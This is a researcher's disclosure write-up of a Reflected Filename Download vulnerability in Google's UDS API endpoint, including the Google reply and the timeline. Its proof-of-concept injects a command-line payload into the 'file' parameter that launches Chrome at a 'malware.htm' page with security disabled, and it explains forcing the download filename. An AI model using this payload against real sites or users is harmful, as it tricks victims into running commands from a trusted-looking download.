Reflected Filename Download on Google

WS201510 – Reflected Filename Download on Google
by David Sopas @dsopas
www.websegura.net

Description:

I found a Reflected Filename Download on Google API – Google UDS [User Distributed Search].
For me it was a challenge and a pleasure to find this because so far I only discovered Reflected Filename Download vulnerabilities in JSON files.
People need to consider that RFD is not a JSON issue.
You can find these type of vulnerabilities in other types too – like this one on Javascript.

The security issue is located at:

https://www.google.com/uds/?file=gdata&v=1.x

And here:

https://adwords.google.com/uds/?file=dont_exists&v=1.x

Where you can inject and manipulate the response using the file variable.
The problem is that even if the file/module don’t exists it returns HTTP code 200.

https://www.google.com/uds/?file=dont_exists&v=1.x

var error = new Error(“Module: ‘dont_exists’ not found!”);
error.toString = function() { return this.message; }
throw error;

google_rfd_01

Proof-of-concept:

Reflecting URL variables with HTTP code 200 is not always a good idea and gave me the opportunity to issue a RFD attack.

var error = new Error(“Module: ‘gdata\”||start chrome websegura.net\/malware.htm –disable-web-security –disable-popup-blocking||’ not found!”);
error.toString = function() { return this.message; }
throw error;

So the Reflected part is done. Now I only need to control the filename. Due to filename restritions on the Google path I need to use HTML5 A DOWNLOAD attribute to do this. Due to this situation “only” the following browsers are supported:

– Chrome
– Opera
– Android Browser
– Chrome for Android
– Firefox [forcing the user to “Save Link As” – done with simple javascript return:false;]

What this RFD attack will do is when the user click on the download link will get a file supposed to be on Google.com [a trusted domain] gaining credibility from the victim.

google_rfd_02
google_rfd_03

Google replied:

The reward panel reviewed this finding and decided that it does not meet the bar for a financial reward, but we would like to acknowledge your contribution
to Google security in our Hall of Fame. A general perspective on the issue is shared here: http://lcamtuf.blogspot.com/2014/03/messing-around-with-download.html
That said, we do appreciate your report and would like to add you to our Hall of Fame available at the following URL:

This didn’t got me any bounty but they were nice enough to give me a Honorable Mention – my second one :)

Timeline:

16 Mar 15 – Submited to Google
18 Mar 15 – Google filed the bug
07 Apr 15 – Google replied
08 Apr 15 – Full disclosure

Achaste interessante? Partilha!